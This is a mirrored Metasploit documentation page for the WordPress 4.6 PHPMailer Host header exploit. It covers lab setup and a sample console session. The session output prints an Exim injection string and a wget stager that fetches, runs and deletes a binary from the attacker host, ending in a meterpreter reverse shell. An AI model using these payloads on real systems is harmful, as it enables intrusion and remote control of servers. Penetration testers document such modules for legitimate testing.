adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c48a6ddbdfc02bf92b8d4e247dbe89bdfba4e821
metasploit-gs/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
T
William Vu 3893bc4d83 Update doc with new prestager command
2017-05-16 14:48:12 -05:00

2.4 KiB
Raw Blame History

Intro

This vuln has some caveats: you need approximately WordPress 4.6 with Exim for the sendmail(8) command. You do not need to install PHPMailer, as it is included as part of the WordPress install.

Thanks to WP's awesome practice of backporting the heck out of all their patches, we need to use a Git clone and check out the vuln release.

Setup

This was tested on Ubuntu 15.04. YMMV.

  1. got root?
  2. cd /var/www/html
  3. git clone https://github.com/WordPress/WordPress wordpress-4.6
  4. chown -R www-data:www-data wordpress-4.6
  5. cd wordpress-4.6
  6. git checkout 4.6
  7. Set up a MySQL database for WordPress
  8. Install as normal

Options

VERBOSE

If you'd like to see what requests are being sent, set this to true. You should see the Exim prestager commands being sent to the target.

Usage

msf > use exploit/unix/webapp/wp_phpmailer_host_header 
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
rhost => 192.168.33.135
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
targeturi => /wordpress-4.6
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1 
lhost => 192.168.33.1
msf exploit(wp_phpmailer_host_header) > set verbose true
verbose => true
msf exploit(wp_phpmailer_host_header) > run

[*] Started HTTPS reverse handler on https://192.168.33.1:8443
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
[*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/mbpvuuck
[*] Local IP: http://[redacted]:8080/mbpvuuck
[*] Generating and sending Exim prestager
[*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
[+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
[+] Sending payload linux/x64/meterpreter_reverse_https
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
[*] Sending /bin/rm -f /tmp/vfotastd
[*] Server stopped.

meterpreter >
Reference in New Issue View Git Blame Copy Permalink